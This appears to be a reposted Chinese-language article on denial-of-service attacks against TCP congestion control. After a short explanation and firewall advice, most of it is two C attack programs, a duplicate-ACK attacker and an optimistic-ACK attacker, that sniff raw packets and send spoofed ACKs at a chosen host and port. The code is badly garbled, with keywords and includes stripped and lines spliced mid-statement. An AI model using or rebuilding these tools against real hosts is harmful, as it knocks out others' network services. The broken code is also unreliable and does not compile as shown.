密码算法与协议：TCP 协议拥塞窗口算法攻击

TCP 协议层中与拥塞窗口算法有关的部分存在容易被攻击的漏洞。
这种攻击基于协议层本身，因此任何实现了 TCP 的系统都会受到影响。

危害性:

通过制造拥塞，可以使受攻击主机无法与任何指定主机进行正常的 TCP 层数据传输。这类攻击的后果是所有 TCP 服务（包括 Web、Mail、FTP 等）都会出现拒绝服务。

攻击方法有两到三种。没有任何补丁可以防止这种攻击，除非在防火墙上设置防范，或者更改 TCP 协议头部结构。


理论基础：什么是 ACK_SEQ

ACK_SEQ 表示数据包已被正确接收。

ACK_SEQ 等于接收到的数据包的 SEQ 与该数据包净荷长度之和。

由于 PUSH 标志位的存在，可以任意指定 SEQ 的大小。

--- 攻击原理 ---

1) 重复发送数据包：任何 IP 数据包都有可能被重复发送到同一个接收端。
通过构造重复的 TCP 数据包，并使每个数据包带有不同的 ACK，能够造成数据窗口拥塞。

2) 预先判断发送方的数据长度，在数据尚未真正到达接收方之前就开始发送返回的 ACK 数据包，从而造成拥塞。



解决方案：
在防火墙端进行设置，对非紧急数据类型（例如 TELNET 以外的普通 TCP 连接）检查是否存在 PUSH 标志并加以过滤。


攻击方法：
1) 重复发送数据包：任何 IP 数据包都有可能被重复发送到同一个接收端。
通过构造重复的 TCP 数据包，并使每个数据包带有不同的 ACK，能够造成数据窗口拥塞。
攻击代码
############################

# <stdio.h>
# <unistd.h>
# <stdlib.h>
# <.h>
# <errno.h>
# <err.h>

# <sys/.h>
# <sys/ioctl.h>
# <arpa/inet.h>
# <net/.h>
# <net/_arp.h>
# <netinet/in.h>
# <netinet/ip.h>
# <netinet/tcp.h>

# <linux/_ether.h>
# <linux/_packet.h>

extern errno;
struct sockaddr_in sin;
ss;

void send_dupack(void *, unsigned char);

# MAS 128 /* Max Ack Size */
/*
# BOLD "\033[1;1m"
# N "\033[0m"
*/
( argc, char **argv)
{
struct req r; /* erface query struct */
sfd, nt, nd, off, hdr =1; /* , number time to apply dup,
* number of dup, datalink off */
unsigned daddr; /* dest addr to check */
unsigned port; /* dest port to check */

prf( " ldaa - "
/*BOLD*/ "lamer dup ack attacker" /*N*/
" - by [email protected]\n");

(argc != 6)
{
fprf(stderr,
" usage: %s host port ace n.dup n.times\n" \
" %s:\tis ldaa this program ...\n" \
" host:\t\thost to attack, _disibledevent=> nd =atoi(argv[4]);
daddr =inet_addr(argv[1]);
port =htons(atoi(argv[2]));

sin.sin_port =port;
sin.sin_addr.s_addr =daddr;
sin.sin_family =AF_INET;

((sfd =(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) -1)
err(errno, " _disibledevent=> err(errno, " _disibledevent=> err(errno, "sockopt IP_HDRINCL");

strncpy(r.r_name, argv[3], (r.r_name));

(ioctl(sfd, SIOCGIFHWADDR, &r) -1)
err(errno, "ioctl SIOCGIFHWADDR of %s", argv[3]);

switch(r.r_hwaddr.sa_family)
{
ARPHRD_ETHER:
ARPHRD_METRICOM:
ARPHRD_EETHER:
off =14;
;
ARPHRD_PPP:
off =0;
;
ARPHRD_LOOPBACK:
off =4;
;
default:
err(ENODEV, "unknow linktype for device %s", argv[3]);
}

while(nt)
{
char packet[MAS];
unsigned ack_seq;
struct iphdr *ip;
struct tcphdr *tcp;
n;

((n =read(sfd, &packet, MAS)) -1)
err(errno, "read _disibledevent=>
(ip->protocol != IPPROTO_TCP || ip->daddr !=daddr)
continue;

(char *)tcp =(char *)ip +(struct iphdr);

(tcp->dest !=port)
continue;

// (tcp->ack && !tcp->syn && !tcp->rst && tcp->ack_seq !=ack_seq)
(1) {
cnt;

prf(" dup seq %u ack %u\n", tcp->seq, tcp->ack_seq);
for(cnt =0; cnt !=nd; cnt)
{
prf(" cnt %d nd %d nt %d\n", cnt, nd, nt);
send_dupack((void *)ip, ntohs(ip->tot_len));
}

nt--;
ack_seq =tcp->ack_seq;
}
}

exit(EXIT_SUCCESS);
}

void send_dupack(void *pkt, unsigned char len)
{
(sendto(ss, pkt, len, 0x0000, &sin, (sin)) -1)
err(errno, "error _disibledevent=>数据长度在数据没有真正到达接受方的前开始发送返回ACK 数据包从而造成堵塞.

攻击代码
##########

# <stdio.h>
# <unistd.h>
# <stdlib.h>
# <.h>
# <errno.h>
# <err.h>

# <sys/.h>
# <sys/ioctl.h>
# <arpa/inet.h>
# <net/.h>
# <net/_arp.h>
# <netinet/in.h>
# <netinet/ip.h>
# <netinet/tcp.h>

# <linux/_ether.h>
# <linux/_packet.h>

extern errno;

struct sockaddr_in sin;
unsigned l_ack;
ss, ns;

unsigned sum(unsigned *, );
void ssoa(void *, struct tcphdr *, size_t, );

# MAS 128 /* Max Ack Size */

( argc, char **argv)
{
struct req r; /* erface query struct */
sfd, off, wa, hdr =1; /* , number time to apply dup,
* number of dup, datalink off */
unsigned daddr; /* dest addr to check */
unsigned port; /* dest port to check */

prf(" optimistic acking attacker - by [email protected]\n\n");

(argc != 6)
{
fprf(stderr,
" usage: %s host port ace n.spoof n.wait\n" \
" host:\thost to attack, _disibledevent=> port =htons(atoi(argv[2]));
ns =atoi(argv[4]);
wa =atoi(argv[5]);

sin.sin_port =port;
sin.sin_addr.s_addr =daddr;
sin.sin_family =AF_INET;

((sfd =(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) -1)
err(errno, " _disibledevent=> err(errno, " _disibledevent=> err(errno, "sockopt IP_HDRINCL");

strncpy(r.r_name, argv[3], (r.r_name));

(ioctl(sfd, SIOCGIFHWADDR, &r) -1)
err(errno, "ioctl SIOCGIFHWADDR of %s", argv[3]);

switch(r.r_hwaddr.sa_family)
{
ARPHRD_ETHER:
ARPHRD_METRICOM:
ARPHRD_EETHER:
off =14;
;
ARPHRD_PPP:
off =0;
;
ARPHRD_LOOPBACK:
off =4;
;
default:
err(ENODEV, "unknow linktype for device %s", argv[3]);
}

prf(" reading packet len...\n");

while(1)
{
char packet[MAS];
struct iphdr *ip;
struct tcphdr *tcp;
inc, i;
n;

((n =read(sfd, &packet, MAS)) -1)
err(errno, "read _disibledevent=>
(ip->protocol !=IPPROTO_TCP || ip->daddr !=daddr)
continue;

(char *)tcp =(char *)ip +(struct iphdr);

(tcp->dest !=port)
continue;

(tcp->ack && !tcp->syn && !tcp->rst)
{
chk =ntohl(tcp->ack_seq) -ntohl(l_ack);

(!l_ack)
{
l_ack =tcp->ack_seq;
continue;
}

(!chk)
continue;

prf(" %u", chk);

(chk inc)
{
(i wa)
ssoa(ip, tcp, ntohs(ip->tot_len), inc);
}

{
prf("\n %d packet's size check after %d "
"re for %d \n" ,inc, i +1, chk);
inc =chk;
i =0x0000;
}

l_ack =tcp->ack_seq;
}
}
}

void ssoa(void *pkt, struct tcphdr *x, size_t len, size)
{
k =0x0000;

prf("\n guessed packets len [%d]\n sending ACKs: ", size);

while(k != ns)
{
x->ack_seq htonl(size* k);
x->check =sum((unsigned *)x, (struct tcphdr));

prf(".");

(sendto(ss, pkt, len, 0x0000, &sin, (sin)) -1)
err(errno, "error _disibledevent=>
while(nw > 0)
{
ret *hdr;
nw -= 2;
}

ret = (ret >> 16) + (ret & 0xffff);
ret (ret >> 16);

~(ret);
}




